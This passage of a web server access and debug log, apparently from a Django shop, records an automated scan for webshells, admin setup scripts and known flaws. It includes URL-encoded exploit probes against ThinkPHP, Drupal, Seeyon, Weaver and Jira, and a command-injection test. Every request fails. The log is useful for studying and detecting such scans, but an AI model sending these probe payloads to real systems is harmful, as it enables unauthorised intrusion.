HTTP/1.0" 404 6621 Not Found: /forums.php [10/Dec/2019 18:03:52] "POST /forums.php HTTP/1.0" 404 6624 Not Found: /bbs/index.php [10/Dec/2019 18:03:52] "POST /bbs/index.php HTTP/1.0" 404 6633 Not Found: /forums/index.php [10/Dec/2019 18:03:53] "POST /forums/index.php HTTP/1.0" 404 6642 DEBUG 2019-12-10 18:03:54,074 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [10/Dec/2019 18:03:54] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [10/Dec/2019 18:03:54] "GET /help.php HTTP/1.0" 404 6617 Not Found: /java.php [10/Dec/2019 18:03:54] "GET /java.php HTTP/1.0" 404 6617 Not Found: /_query.php [10/Dec/2019 18:03:54] "GET /_query.php HTTP/1.0" 404 6623 Not Found: /test.php [10/Dec/2019 18:03:55] "GET /test.php HTTP/1.0" 404 6617 Not Found: /db_cts.php [10/Dec/2019 18:03:55] "GET /db_cts.php HTTP/1.0" 404 6623 Not Found: /db_pma.php [10/Dec/2019 18:03:55] "GET /db_pma.php HTTP/1.0" 404 6623 Not Found: /logon.php [10/Dec/2019 18:03:56] "GET /logon.php HTTP/1.0" 404 6620 Not Found: /help-e.php [10/Dec/2019 18:03:56] "GET /help-e.php HTTP/1.0" 404 6623 Not Found: /license.php [10/Dec/2019 18:03:56] "GET /license.php HTTP/1.0" 404 6626 Not Found: /log.php [10/Dec/2019 18:03:56] "GET /log.php HTTP/1.0" 404 6614 Not Found: /hell.php [10/Dec/2019 18:03:57] "GET /hell.php HTTP/1.0" 404 6617 Not Found: /pmd_online.php [10/Dec/2019 18:03:57] "GET /pmd_online.php HTTP/1.0" 404 6635 Not Found: /x.php [10/Dec/2019 18:04:01] "GET /x.php HTTP/1.0" 404 6608 Not Found: /shell.php [10/Dec/2019 18:04:05] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /htdocs.php [10/Dec/2019 18:04:06] "GET /htdocs.php HTTP/1.0" 404 6623 Not Found: /b.php [10/Dec/2019 18:04:09] "GET /b.php HTTP/1.0" 404 6608 Not Found: /sane.php [10/Dec/2019 18:04:09] "GET /sane.php HTTP/1.0" 404 6617 Not Found: /desktop.ini.php [10/Dec/2019 18:04:10] "GET /desktop.ini.php HTTP/1.0" 404 6638 Not Found: /z.php [10/Dec/2019 18:04:10] "GET /z.php HTTP/1.0" 404 6608 Not Found: /lala.php [10/Dec/2019 18:04:10] "GET /lala.php HTTP/1.0" 404 6617 Not Found: /lala-dpr.php [10/Dec/2019 18:04:10] "GET /lala-dpr.php HTTP/1.0" 404 6629 Not Found: /wpc.php [10/Dec/2019 18:04:11] "GET /wpc.php HTTP/1.0" 404 6614 Not Found: /wpo.php [10/Dec/2019 18:04:13] "GET /wpo.php HTTP/1.0" 404 6614 Not Found: /t6nv.php [10/Dec/2019 18:04:13] "GET /t6nv.php HTTP/1.0" 404 6617 Not Found: /muhstik.php [10/Dec/2019 18:04:14] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /text.php [10/Dec/2019 18:04:14] "GET /text.php HTTP/1.0" 404 6617 Not Found: /wp-config.php [10/Dec/2019 18:04:14] "GET /wp-config.php HTTP/1.0" 404 6632 Not Found: /muhstik.php [10/Dec/2019 18:04:14] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /muhstik2.php [10/Dec/2019 18:04:15] "GET /muhstik2.php HTTP/1.0" 404 6629 Not Found: /muhstiks.php [10/Dec/2019 18:04:15] "GET /muhstiks.php HTTP/1.0" 404 6629 Not Found: /muhstik-dpr.php [10/Dec/2019 18:04:15] "GET /muhstik-dpr.php HTTP/1.0" 404 6638 Not Found: /lol.php [10/Dec/2019 18:04:16] "GET /lol.php HTTP/1.0" 404 6614 Not Found: /uploader.php [10/Dec/2019 18:04:16] "GET /uploader.php HTTP/1.0" 404 6629 Not Found: /cmv.php [10/Dec/2019 18:04:17] "GET /cmv.php HTTP/1.0" 404 6614 Not Found: /cmdd.php [10/Dec/2019 18:04:17] "GET /cmdd.php HTTP/1.0" 404 6617 Not Found: /knal.php [10/Dec/2019 18:04:18] "GET /knal.php HTTP/1.0" 404 6617 Not Found: /cmd.php [10/Dec/2019 18:04:18] "GET /cmd.php HTTP/1.0" 404 6614 Not Found: /shell.php [10/Dec/2019 18:04:18] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /appserv.php [10/Dec/2019 18:04:18] "GET /appserv.php HTTP/1.0" 404 6626 Not Found: /scripts/setup.php [10/Dec/2019 18:04:19] "GET /scripts/setup.php HTTP/1.0" 404 6644 Not Found: /phpmyadmin/scripts/setup.php [10/Dec/2019 18:04:19] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /phpMyAdmin/scripts/setup.php [10/Dec/2019 18:04:19] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /scripts/db___.init.php [10/Dec/2019 18:04:20] "GET /scripts/db___.init.php HTTP/1.0" 404 6659 Not Found: /phpmyadmin/scripts/db___.init.php [10/Dec/2019 18:04:20] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6692 Not Found: /phpMyAdmin/scripts/db___.init.php [10/Dec/2019 18:04:20] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6692 Not Found: /pma/scripts/setup.php [10/Dec/2019 18:04:20] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /PMA/scripts/setup.php [10/Dec/2019 18:04:21] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /myadmin/scripts/setup.php [10/Dec/2019 18:04:21] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /MyAdmin/scripts/setup.php [10/Dec/2019 18:04:25] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /pma/scripts/db___.init.php [10/Dec/2019 18:04:25] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /PMA/scripts/db___.init.php [10/Dec/2019 18:04:26] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /myadmin/scripts/db___.init.php [10/Dec/2019 18:04:26] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /plugins/weathermap/editor.php [10/Dec/2019 18:04:29] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6680 Not Found: /cacti/plugins/weathermap/editor.php [10/Dec/2019 18:04:29] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6698 Not Found: /weathermap/editor.php [10/Dec/2019 18:04:30] "GET /weathermap/editor.php HTTP/1.0" 404 6656 Not Found: /index.php [10/Dec/2019 18:04:30] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6867 Not Found: /elrekt.php [10/Dec/2019 18:04:30] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6870 DEBUG 2019-12-10 18:04:30,878 utils 32196 139885071562496 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [10/Dec/2019 18:04:30] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [10/Dec/2019 18:04:31] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6771 Not Found: /index.php [10/Dec/2019 18:04:31] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6676 [10/Dec/2019 18:04:33] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-10 18:04:33,735 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [10/Dec/2019 18:04:33] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-10 18:04:34,027 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [10/Dec/2019 18:04:34] "GET /Joomla/ HTTP/1.0" 404 1728 [10/Dec/2019 18:04:34] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [10/Dec/2019 18:04:34] "GET /d7.php HTTP/1.0" 404 6611 Not Found: /rxr.php [10/Dec/2019 18:04:34] "GET /rxr.php HTTP/1.0" 404 6614 Not Found: /1x.php [10/Dec/2019 18:04:34] "GET /1x.php HTTP/1.0" 404 6611 Not Found: /home.php [10/Dec/2019 18:04:35] "GET /home.php HTTP/1.0" 404 6617 Not Found: /undx.php [10/Dec/2019 18:04:35] "GET /undx.php HTTP/1.0" 404 6617 Not Found: /spider.php [10/Dec/2019 18:04:35] "GET /spider.php HTTP/1.0" 404 6623 Not Found: /payload.php [10/Dec/2019 18:04:36] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /composers.php [10/Dec/2019 18:04:36] "GET /composers.php HTTP/1.0" 404 6632 Not Found: /composer.php [10/Dec/2019 18:04:37] "GET /composer.php HTTP/1.0" 404 6629 Not Found: /hue2.php [10/Dec/2019 18:04:37] "GET /hue2.php HTTP/1.0" 404 6617 Not Found: /Drupal.php [10/Dec/2019 18:04:38] "GET /Drupal.php HTTP/1.0" 404 6623 Not Found: /lang.php [10/Dec/2019 18:04:38] "GET /lang.php?f=1 HTTP/1.0" 404 6621 Not Found: /izom.php [10/Dec/2019 18:04:38] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /payload.php [10/Dec/2019 18:04:38] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /new_license.php [10/Dec/2019 18:04:39] "GET /new_license.php HTTP/1.0" 404 6638 Not Found: /images/!.php [10/Dec/2019 18:04:39] "GET /images/!.php HTTP/1.0" 404 6629 Not Found: /images/vuln.php [10/Dec/2019 18:04:39] "GET /images/vuln.php HTTP/1.0" 404 6638 Not Found: /hd.php [10/Dec/2019 18:04:39] "GET /hd.php HTTP/1.0" 404 6611 Not Found: /images/up.php [10/Dec/2019 18:04:40] "GET /images/up.php HTTP/1.0" 404 6632 Not Found: /images/attari.php [10/Dec/2019 18:04:40] "GET /images/attari.php HTTP/1.0" 404 6644 Not Found: /images/jsspwneed.php [10/Dec/2019 18:04:41] "GET /images/jsspwneed.php HTTP/1.0" 404 6653 Not Found: /images/stories/cmd.php [10/Dec/2019 18:04:41] "GET /images/stories/cmd.php HTTP/1.0" 404 6659 Not Found: /images/stories/filemga.php [10/Dec/2019 18:04:42] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6682 Not Found: /up.php [10/Dec/2019 18:04:42] "GET /up.php HTTP/1.0" 404 6611 Not Found: /laravel.php [10/Dec/2019 18:04:42] "GET /laravel.php HTTP/1.0" 404 6626 Not Found: /huoshan.php [10/Dec/2019 18:04:42] "GET /huoshan.php HTTP/1.0" 404 6626 Not Found: /yu.php [10/Dec/2019 18:04:43] "GET /yu.php HTTP/1.0" 404 6611 Not Found: /floaw.php [10/Dec/2019 18:04:43] "GET /floaw.php HTTP/1.0" 404 6620 Not Found: /ftmabc.php [10/Dec/2019 18:04:43] "GET /ftmabc.php HTTP/1.0" 404 6623 Not Found: /doudou.php [10/Dec/2019 18:04:44] "GET /doudou.php HTTP/1.0" 404 6623 Not Found: /mjx.php [10/Dec/2019 18:04:44] "GET /mjx.php HTTP/1.0" 404 6614 Not Found: /xiaoxia.php [10/Dec/2019 18:04:44] "GET /xiaoxia.php HTTP/1.0" 404 6626 Not Found: /yuyang.php [10/Dec/2019 18:04:44] "GET /yuyang.php HTTP/1.0" 404 6623 Not Found: /zz.php [10/Dec/2019 18:04:45] "GET /zz.php HTTP/1.0" 404 6611 Not Found: /coonig.php [10/Dec/2019 18:04:45] "GET /coonig.php HTTP/1.0" 404 6623 Not Found: /ak.php [10/Dec/2019 18:04:49] "GET /ak.php HTTP/1.0" 404 6611 Not Found: /baidoubi.php [10/Dec/2019 18:04:49] "GET /baidoubi.php HTTP/1.0" 404 6629 Not Found: /hhhhhh.php [10/Dec/2019 18:04:50] "GET /hhhhhh.php HTTP/1.0" 404 6623 Not Found: /meijianxue.php [10/Dec/2019 18:04:50] "GET /meijianxue.php HTTP/1.0" 404 6635 Not Found: /python.php [10/Dec/2019 18:04:53] "GET /python.php HTTP/1.0" 404 6623 Not Found: /woshimengmei.php [10/Dec/2019 18:04:53] "GET /woshimengmei.php HTTP/1.0" 404 6641 Not Found: /indea.php [10/Dec/2019 18:04:54] "GET /indea.php HTTP/1.0" 404 6620 Not Found: /taisui.php [10/Dec/2019 18:04:54] "GET /taisui.php HTTP/1.0" 404 6623 Not Found: /xiaxia.php [10/Dec/2019 18:04:54] "GET /xiaxia.php HTTP/1.0" 404 6623 Not Found: /kk.php [10/Dec/2019 18:04:54] "GET /kk.php HTTP/1.0" 404 6611 Not Found: /xsser.php [10/Dec/2019 18:04:55] "GET /xsser.php HTTP/1.0" 404 6620 Not Found: /zzz.php [10/Dec/2019 18:04:55] "GET /zzz.php HTTP/1.0" 404 6614 Not Found: /99.php [10/Dec/2019 18:04:57] "GET /99.php HTTP/1.0" 404 6611 Not Found: /dp.php [10/Dec/2019 18:04:57] "GET /dp.php HTTP/1.0" 404 6611 Not Found: /hs.php [10/Dec/2019 18:04:58] "GET /hs.php HTTP/1.0" 404 6611 Not Found: /1ts.php [10/Dec/2019 18:04:58] "GET /1ts.php HTTP/1.0" 404 6614 Not Found: /haiyan.php [10/Dec/2019 18:04:58] "GET /haiyan.php HTTP/1.0" 404 6623 Not Found: /phpdm.php [10/Dec/2019 18:04:58] "GET /phpdm.php HTTP/1.0" 404 6620 Not Found: /root.php [10/Dec/2019 18:04:59] "GET /root.php HTTP/1.0" 404 6617 Not Found: /5678.php [10/Dec/2019 18:04:59] "GET /5678.php HTTP/1.0" 404 6617 Not Found: /root11.php [10/Dec/2019 18:04:59] "GET /root11.php HTTP/1.0" 404 6623 Not Found: /xiu.php [10/Dec/2019 18:05:00] "GET /xiu.php HTTP/1.0" 404 6614 Not Found: /wuwu11.php [10/Dec/2019 18:05:00] "POST /wuwu11.php HTTP/1.0" 404 6624 Not Found: /xw1.php [10/Dec/2019 18:05:01] "POST /xw1.php HTTP/1.0" 404 6615 Not Found: /9678.php [10/Dec/2019 18:05:02] "POST /9678.php HTTP/1.0" 404 6618 Not Found: /wc.php [10/Dec/2019 18:05:02] "POST /wc.php HTTP/1.0" 404 6612 Not Found: /xx.php [10/Dec/2019 18:05:02] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /xx.php [10/Dec/2019 18:05:02] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /s.php [10/Dec/2019 18:05:03] "POST /s.php HTTP/1.0" 404 6609 [10/Dec/2019 18:05:03] "GET / HTTP/1.0" 302 0 Not Found: /w.php [10/Dec/2019 18:05:03] "POST /w.php HTTP/1.0" 404 6609 Not Found: /sheep.php [10/Dec/2019 18:05:03] "POST /sheep.php HTTP/1.0" 404 6621 Not Found: /qaq.php [10/Dec/2019 18:05:03] "POST /qaq.php HTTP/1.0" 404 6615 Not Found: /my.php [10/Dec/2019 18:05:04] "POST /my.php HTTP/1.0" 404 6612 Not Found: /qq.php [10/Dec/2019 18:05:04] "POST /qq.php HTTP/1.0" 404 6612 Not Found: /aaa.php [10/Dec/2019 18:05:04] "POST /aaa.php HTTP/1.0" 404 6615 Not Found: /hhh.php [10/Dec/2019 18:05:05] "POST /hhh.php HTTP/1.0" 404 6615 Not Found: /jjj.php [10/Dec/2019 18:05:05] "POST /jjj.php HTTP/1.0" 404 6615 Not Found: /www.php [10/Dec/2019 18:05:09] "POST /www.php HTTP/1.0" 404 6615 Not Found: /ffr.php [10/Dec/2019 18:05:10] "POST /ffr.php HTTP/1.0" 404 6615 Not Found: /411.php [10/Dec/2019 18:05:10] "POST /411.php HTTP/1.0" 404 6615 Not Found: /415.php [10/Dec/2019 18:05:13] "POST /415.php HTTP/1.0" 404 6615 Not Found: /421.php [10/Dec/2019 18:05:13] "POST /421.php HTTP/1.0" 404 6615 Not Found: /444.php [10/Dec/2019 18:05:14] "POST /444.php HTTP/1.0" 404 6615 Not Found: /a411.php [10/Dec/2019 18:05:14] "POST /a411.php HTTP/1.0" 404 6618 Not Found: /whoami.php [10/Dec/2019 18:05:14] "POST /whoami.php HTTP/1.0" 404 6624 Not Found: /whoami.php.php [10/Dec/2019 18:05:14] "POST /whoami.php.php HTTP/1.0" 404 6636 Not Found: /9.php [10/Dec/2019 18:05:15] "POST /9.php HTTP/1.0" 404 6609 Not Found: /98k.php [10/Dec/2019 18:05:15] "POST /98k.php HTTP/1.0" 404 6615 Not Found: /887.php [10/Dec/2019 18:05:17] "POST /887.php HTTP/1.0" 404 6615 Not Found: /888.php [10/Dec/2019 18:05:17] "POST /888.php HTTP/1.0" 404 6615 Not Found: /aa.php [10/Dec/2019 18:05:18] "POST /aa.php HTTP/1.0" 404 6612 Not Found: /bb.php [10/Dec/2019 18:05:18] "POST /bb.php HTTP/1.0" 404 6612 Not Found: /pp.php [10/Dec/2019 18:05:18] "POST /pp.php HTTP/1.0" 404 6612 Not Found: /tt.php [10/Dec/2019 18:05:18] "POST /tt.php HTTP/1.0" 404 6612 Not Found: /bbq.php [10/Dec/2019 18:05:19] "POST /bbq.php HTTP/1.0" 404 6615 Not Found: /jj1.php [10/Dec/2019 18:05:19] "POST /jj1.php HTTP/1.0" 404 6615 Not Found: /jbb.php [10/Dec/2019 18:05:21] "POST /jbb.php HTTP/1.0" 404 6615 Not Found: /7o.php [10/Dec/2019 18:05:21] "POST /7o.php HTTP/1.0" 404 6612 Not Found: /qwq.php [10/Dec/2019 18:05:22] "POST /qwq.php HTTP/1.0" 404 6615 Not Found: /nb.php [10/Dec/2019 18:05:22] "POST /nb.php HTTP/1.0" 404 6612 Not Found: /kpl.php [10/Dec/2019 18:05:22] "POST /kpl.php HTTP/1.0" 404 6615 Not Found: /hgx.php [10/Dec/2019 18:05:22] "POST /hgx.php HTTP/1.0" 404 6615 Not Found: /ppl.php [10/Dec/2019 18:05:23] "POST /ppl.php HTTP/1.0" 404 6615 Not Found: /tty.php [10/Dec/2019 18:05:23] "POST /tty.php HTTP/1.0" 404 6615 Not Found: /ooi.php [10/Dec/2019 18:05:23] "POST /ooi.php HTTP/1.0" 404 6615 Not Found: /aap.php [10/Dec/2019 18:05:24] "POST /aap.php HTTP/1.0" 404 6615 Not Found: /app.php [10/Dec/2019 18:05:24] "POST /app.php HTTP/1.0" 404 6615 Not Found: /bbr.php [10/Dec/2019 18:05:24] "POST /bbr.php HTTP/1.0" 404 6615 Not Found: /ioi.php [10/Dec/2019 18:05:25] "POST /ioi.php HTTP/1.0" 404 6615 Not Found: /uuu.php [10/Dec/2019 18:05:25] "POST /uuu.php HTTP/1.0" 404 6615 Not Found: /yyy.php [10/Dec/2019 18:05:26] "POST /yyy.php HTTP/1.0" 404 6615 Not Found: /ack.php [10/Dec/2019 18:05:26] "POST /ack.php HTTP/1.0" 404 6615 Not Found: /shh.php [10/Dec/2019 18:05:26] "POST /shh.php HTTP/1.0" 404 6615 Not Found: /ddd.php [10/Dec/2019 18:05:26] "POST /ddd.php HTTP/1.0" 404 6615 Not Found: /nnn.php [10/Dec/2019 18:05:27] "POST /nnn.php HTTP/1.0" 404 6615 Not Found: /rrr.php [10/Dec/2019 18:05:27] "POST /rrr.php HTTP/1.0" 404 6615 Not Found: /ttt.php [10/Dec/2019 18:05:27] "POST /ttt.php HTTP/1.0" 404 6615 Not Found: /bbqq.php [10/Dec/2019 18:05:28] "POST /bbqq.php HTTP/1.0" 404 6618 Not Found: /tyrant.php [10/Dec/2019 18:05:28] "POST /tyrant.php HTTP/1.0" 404 6624 Not Found: /qiqi.php [10/Dec/2019 18:05:28] "POST /qiqi.php HTTP/1.0" 404 6618 Not Found: /qiqi1.php [10/Dec/2019 18:05:28] "POST /qiqi1.php HTTP/1.0" 404 6621 Not Found: /zhk.php [10/Dec/2019 18:05:29] "POST /zhk.php HTTP/1.0" 404 6615 Not Found: /bbv.php [10/Dec/2019 18:05:29] "POST /bbv.php HTTP/1.0" 404 6615 Not Found: /admin1.php [10/Dec/2019 18:05:33] "POST /admin1.php HTTP/1.0" 404 6624 Not Found: /xi.php [10/Dec/2019 18:05:34] "POST /xi.php HTTP/1.0" 404 6612 Not Found: /999.php [10/Dec/2019 18:05:34] "POST /999.php HTTP/1.0" 404 6615 Not Found: /jsc.php.php [10/Dec/2019 18:05:37] "POST /jsc.php.php HTTP/1.0" 404 6627 Not Found: /jsc.php [10/Dec/2019 18:05:37] "POST /jsc.php HTTP/1.0" 404 6615 Not Found: /11a.php [10/Dec/2019 18:05:38] "POST /11a.php HTTP/1.0" 404 6615 Not Found: /kkl.php [10/Dec/2019 18:05:38] "POST /kkl.php HTTP/1.0" 404 6615 Not Found: /ks1.php [10/Dec/2019 18:05:38] "POST /ks1.php HTTP/1.0" 404 6615 Not Found: /ooo.php [10/Dec/2019 18:05:38] "POST /ooo.php HTTP/1.0" 404 6615 Not Found: /wsx.php [10/Dec/2019 18:05:39] "POST /wsx.php HTTP/1.0" 404 6615 Not Found: /lz.php [10/Dec/2019 18:05:39] "POST /lz.php HTTP/1.0" 404 6612 Not Found: /803.php [10/Dec/2019 18:05:41] "POST /803.php HTTP/1.0" 404 6615 Not Found: /zzz.php [10/Dec/2019 18:05:41] "POST /zzz.php HTTP/1.0" 404 6615 Not Found: /ze.php [10/Dec/2019 18:05:42] "POST /ze.php HTTP/1.0" 404 6612 Not Found: /nnb.php [10/Dec/2019 18:05:42] "POST /nnb.php HTTP/1.0" 404 6615 Not Found: /lkio.php [10/Dec/2019 18:05:42] "POST /lkio.php HTTP/1.0" 404 6618 Not Found: /mm.php [10/Dec/2019 18:05:43] "POST /mm.php HTTP/1.0" 404 6612 Not Found: /mmp.php [10/Dec/2019 18:05:43] "POST /mmp.php HTTP/1.0" 404 6615 Not Found: /hades.php [10/Dec/2019 18:05:43] "POST /hades.php HTTP/1.0" 404 6621 Not Found: /muma.php [10/Dec/2019 18:05:43] "POST /muma.php HTTP/1.0" 404 6618 Not Found: /shell.php [10/Dec/2019 18:05:44] "POST /shell.php HTTP/1.0" 404 6621 Not Found: /zza.php [10/Dec/2019 18:05:44] "POST /zza.php HTTP/1.0" 404 6615 Not Found: /ag.php [10/Dec/2019 18:05:45] "POST /ag.php HTTP/1.0" 404 6612 Not Found: /2ndex.php [10/Dec/2019 18:05:45] "POST /2ndex.php HTTP/1.0" 404 6621 Not Found: /my.php [10/Dec/2019 18:05:46] "POST /my.php HTTP/1.0" 404 6612 Not Found: /aa.php [10/Dec/2019 18:05:46] "POST /aa.php HTTP/1.0" 404 6612 Not Found: /qq.php [10/Dec/2019 18:05:46] "POST /qq.php HTTP/1.0" 404 6612 Not Found: /config.php [10/Dec/2019 18:05:46] "POST /config.php HTTP/1.0" 404 6624 Not Found: /1.php [10/Dec/2019 18:05:47] "POST /1.php HTTP/1.0" 404 6609 Not Found: /1.php [10/Dec/2019 18:05:47] "POST /1.php HTTP/1.0" 404 6609 Not Found: /miao.php [10/Dec/2019 18:05:47] "POST /miao.php HTTP/1.0" 404 6618 Not Found: /j.php [10/Dec/2019 18:05:48] "POST /j.php HTTP/1.0" 404 6609 Not Found: /cc.php [10/Dec/2019 18:05:48] "POST /cc.php HTTP/1.0" 404 6612 Not Found: /xiaodai.php [10/Dec/2019 18:05:48] "POST /xiaodai.php HTTP/1.0" 404 6627 Not Found: /abak.php [10/Dec/2019 18:05:48] "POST /abak.php HTTP/1.0" 404 6618 Not Found: /pass.php [10/Dec/2019 18:05:49] "POST /pass.php HTTP/1.0" 404 6618 Not Found: /olelist.php [10/Dec/2019 18:05:49] "POST /olelist.php HTTP/1.0" 404 6627 Not Found: /t00ls.php [10/Dec/2019 18:05:53] "POST /t00ls.php HTTP/1.0" 404 6621 Not Found: /about_ver.php [10/Dec/2019 18:05:53] "POST /about_ver.php HTTP/1.0" 404 6633 Not Found: /edmin.php [10/Dec/2019 18:05:54] "POST /edmin.php HTTP/1.0" 404 6621 Not Found: /sconfig.php [10/Dec/2019 18:05:54] "POST /sconfig.php HTTP/1.0" 404 6627 Not Found: /logo.php [10/Dec/2019 18:05:57] "POST /logo.php HTTP/1.0" 404 6618 Not Found: /o.php [10/Dec/2019 18:05:57] "POST /o.php HTTP/1.0" 404 6609 Not Found: /shell.php [10/Dec/2019 18:05:58] "POST /shell.php HTTP/1.0" 404 6621 Not Found: /asjc.php [10/Dec/2019 18:06:01] "POST /asjc.php HTTP/1.0" 404 6618 Not Found: /test.php [10/Dec/2019 18:06:01] "POST /test.php HTTP/1.0" 404 6618 Not Found: /fuck.php [10/Dec/2019 18:06:02] "POST /fuck.php HTTP/1.0" 404 6618 Not Found: /freebook.php [10/Dec/2019 18:06:02] "POST /freebook.php HTTP/1.0" 404 6630 Not Found: /goodbook.php [10/Dec/2019 18:06:02] "POST /goodbook.php HTTP/1.0" 404 6630 Not Found: /tools.php [10/Dec/2019 18:06:02] "POST /tools.php HTTP/1.0" 404 6621 Not Found: /indexl.php [10/Dec/2019 18:06:03] "POST /indexl.php HTTP/1.0" 404 6624 Not Found: /gotemp.php [10/Dec/2019 18:06:03] "POST /gotemp.php HTTP/1.0" 404 6624 Not Found: /sql.php [10/Dec/2019 18:06:05] "POST /sql.php HTTP/1.0" 404 6615 Not Found: /conf.php [10/Dec/2019 18:06:05] "POST /conf.php HTTP/1.0" 404 6618 Not Found: /pagefile.php [10/Dec/2019 18:06:06] "POST /pagefile.php HTTP/1.0" 404 6630 Not Found: /settings.php [10/Dec/2019 18:06:06] "POST /settings.php HTTP/1.0" 404 6630 Not Found: /system.php [10/Dec/2019 18:06:06] "POST /system.php HTTP/1.0" 404 6624 Not Found: /test123.php [10/Dec/2019 18:06:06] "POST /test123.php HTTP/1.0" 404 6627 Not Found: /think.php [10/Dec/2019 18:06:07] "POST /think.php HTTP/1.0" 404 6621 Not Found: /db.init.php [10/Dec/2019 18:06:07] "POST /db.init.php HTTP/1.0" 404 6627 Not Found: /db_session.init.php [10/Dec/2019 18:06:07] "POST /db_session.init.php HTTP/1.0" 404 6651 Not Found: /db__.init.php [10/Dec/2019 18:06:08] "POST /db__.init.php HTTP/1.0" 404 6633 Not Found: /wp-admins.php [10/Dec/2019 18:06:08] "POST /wp-admins.php HTTP/1.0" 404 6633 Not Found: /seeyon/htmlofficeservlet [10/Dec/2019 18:06:09] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6665 Not Found: /secure/ContactAdministrators!default.jspa [10/Dec/2019 18:06:09] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6716 Not Found: /weaver/bsh.servlet.BshServlet [10/Dec/2019 18:06:10] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6680 DEBUG 2019-12-10 18:06:10,401 utils 32196 139885071562496 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) Not Found: /solr/ [10/Dec/2019 18:06:10] "GET /solr/ HTTP/1.0" 404 1724 Not Found: /index.php [10/Dec/2019 18:06:10] "POST /index.php HTTP/1.0" 404 6621 Not Found: /user/register [10/Dec/2019 18:06:10] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6870 Not Found: /user.php [10/Dec/2019 18:09:49] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6618 Not Found: /index.php [10/Dec/2019 18:09:50] "GET /index.php HTTP/1.0" 404 6620 Not 